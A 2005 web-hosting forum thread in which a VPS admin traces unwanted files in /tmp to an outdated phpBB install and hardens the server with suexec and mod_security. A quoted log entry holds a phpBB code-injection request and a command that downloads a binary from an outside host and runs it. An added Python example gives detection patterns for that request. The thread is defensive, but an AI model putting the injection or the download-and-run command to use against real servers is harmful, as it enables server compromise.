Linux VPS - Security and Tuning Security and Tuning Discussion for Linux Virtual Private Servers based on Virtuozzo by SWsoft

#1
07-18-2005, 07:42 PM
mikelbeck
Guest
Who sent up this file?

How can I find out who uploaded a file?

I've been getting a lot of crap in my /tmp directory. This afternoon I found bd, and a bunch of bd.1, bd.2, etc. files. Plus bash. I deleted them all; this evening I found another bash. It shows it's owned by "nobody".

Is there any way I can find out who sent this file up? And would somebody be able to send something up to my /tmp directory?

#2
07-18-2005, 07:58 PM
Fred
Senior Member
Join Date: Jun 2005
Posts: 601

It was uploaded by Apache.
You should check if your tmp is secure... i.e. no ability to execute files.

You should write support about it. They sure have something for you.

Personally, I'm using PHP with phpsuexec and suexec for CGI, Perl files... so I think I would be able to find who is doing it because I think every file will be owned by the user.... You should think about enabling these protections.

But first ask support@, they can help you for sure... Don't wait!!

#3
07-18-2005, 08:02 PM
mikelbeck
Guest

Quote:
Originally Posted by Fred
It was uploaded by Apache.
You should check if your tmp is secure... i.e. no ability to execute files.

You should write support about it. They sure have something for you.

Personally, I'm using PHP with phpsuexec and suexec for CGI, Perl files... so I think I would be able to find who is doing it because I think every file will be owned by the user.... You should think about enabling these protections.

But first ask support@, they can help you for sure... Don't wait!!

I opened a ticket, already got a response. ;-)

They said that one of my domains running phpBB is using an old module, it'll have to be upgraded to the latest.

#4
07-18-2005, 08:09 PM
Fred
Senior Member
Join Date: Jun 2005
Posts: 601

OK, the phpBB module was abused?

A lot of hosts are banning phpBB forums from their servers... see: http://www.webhostingtalk.com/showth...hreadid=424624

IMO, we shouldn't ban... but we must stay aware of any updates and security risks... Run modsecurity... and *force* the user to update to the latest version.

I was thinking about modifying my terms of service to include something about updates and latest version...

#5
07-18-2005, 08:29 PM
mikelbeck
Guest

Quote:
Originally Posted by Fred
Personally, I'm using PHP with phpsuexec and suexec for CGI, Perl files... so I think I would be able to find who is doing it because I think every file will be owned by the user.... You should think about enabling these protections.

I already have suexec enabled (according to cPanel). How do I enable phpsuexec?

#6
07-18-2005, 08:54 PM
mikelbeck
Guest

Quote:
Originally Posted by mikelbeck
I already have suexec enabled (according to cPanel). How do I enable phpsuexec?

Never mind, I found it.

#7
07-18-2005, 08:59 PM
Fred
Senior Member
Join Date: Jun 2005
Posts: 601

I think it needs to be enabled when you compile Apache... See the software section in WHM and look for Apache update... you can see a lot of options from that place.

I'm not really sure I enabled it from there... so again, you should ask support or... wait here for a reply or try Google.

#8
07-18-2005, 09:00 PM
Fred
Senior Member
Join Date: Jun 2005
Posts: 601

good then :P

#9
07-18-2005, 10:20 PM
mikelbeck
Guest

Yeah, it looks like there's (yet another) phpBB bug. The site that's being attacked is on 2.0.15, I know the latest is 2.0.16 and I've told the admin he has to update it ASAP.

I've enabled suexec, phpsuexec and mod_security. Actually, mod_security was already installed, I just tightened it up a bit. And it looks like I've stopped the attack for the time being:

Quote:
========================================
Request: 69.58.0.69 - - [18/Jul/2005:22:10:22 -0400] "GET /forums/viewtopic.php?t=535&view=next&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.0" 403 632
Handler: server-parsed
----------------------------------------
GET /forums/viewtopic.php?t=535&view=next&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.0
Accept: */*
Host: www.....com
PHP: cd /tmp;wget www.nordicfiber.com/~racer/libs;mv libs bash;chmod 777 bash;./bash
User-Agent: Mozilla/4.0
mod_security-message: Access denied with code 403. Pattern match "'" at THE_REQUEST.
mod_security-action: 403

HTTP/1.0 403 Forbidden
Connection: close
Content-Type: text/html

I tightened it up a little too much, a user on another site PM'd me to say they couldn't post at all. I was trapping " ' ", which was no good, now I've got it looking for ".system" (among others). That should do it.
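An added example, not part of the original posts: the two filter patterns described in post #9 (a bare apostrophe, and a function-call pattern generalised from ".system") applied in Python to access-log lines. The log lines, the documentation IP addresses and the list of function names are constructed assumptions; each hit carries the client IP and timestamp, which is what the access log can offer toward "who sent this file up".

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines (common log format). The IPs are documentation
# addresses; the third line is the second request percent-encoded.
SAMPLE_LOG = """\
192.0.2.10 - - [18/Jul/2005:22:09:01 -0400] "GET /forums/viewtopic.php?t=535&highlight=don't+panic HTTP/1.0" 200 8123
198.51.100.7 - - [18/Jul/2005:22:10:22 -0400] "GET /forums/viewtopic.php?t=535&view=next&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.0" 403 632
198.51.100.7 - - [18/Jul/2005:22:10:25 -0400] "GET /forums/viewtopic.php?t=535&highlight=%27.system%28getenv%28HTTP_PHP%29%29.%27 HTTP/1.0" 403 632
192.0.2.44 - - [18/Jul/2005:22:11:40 -0400] "GET /forums/viewtopic.php?t=12&highlight=operating+system HTTP/1.0" 200 7740
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*" (\d{3}) ')
# Assumed list of PHP functions that run commands or code, matched only when
# written as a call (name followed by an opening parenthesis).
CALL_RE = re.compile(r"\b(?:system|exec|passthru|shell_exec|popen|proc_open|eval)\s*\(", re.I)

def parse(line):
    """Split one log line into client IP, timestamp, status and decoded query."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    ip, when, target, status = m.groups()
    # Decode %xx and '+' first so an encoded request is matched like a plain one.
    query = unquote_plus(urlsplit(target).query)
    return {"ip": ip, "time": when, "status": int(status), "query": query}

def scan(log_text):
    """Return (broad, narrow): entries hit by the "'" rule and by the call rule."""
    broad, narrow = [], []
    for line in log_text.splitlines():
        entry = parse(line)
        if entry is None:
            continue
        if "'" in entry["query"]:
            broad.append(entry)       # also catches ordinary apostrophes
        if CALL_RE.search(entry["query"]):
            narrow.append(entry)      # only function-call syntax
    return broad, narrow

if __name__ == "__main__":
    broad, narrow = scan(SAMPLE_LOG)
    print("apostrophe rule:", [(e["ip"], e["time"]) for e in broad])
    print("call rule:      ", [(e["ip"], e["time"]) for e in narrow])
```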

#10
07-18-2005, 11:40 PM
Fred
Senior Member
Join Date: Jun 2005
Posts: 601

Cool... they were trying.
But it's probably a bot... most of them are, I think.

I've found a website with good mod_security rules... http://www.eth0.us/?q=mod_security

It's important to test them (I don't have the time for testing... and reading those logs...)... because it could break a lot of scripts...

See what rules you currently run (check in your httpd.conf for the rules location... Check for includes in the included rules file...). I think I have two files for the mod_sec rules... one is mine as user.conf (I think)...
and the other comes from a powervps cron job... (with a pretty good and standard set of rules... Updated probably when a new vulnerability comes out... It's pretty cool.)


All times are GMT -4.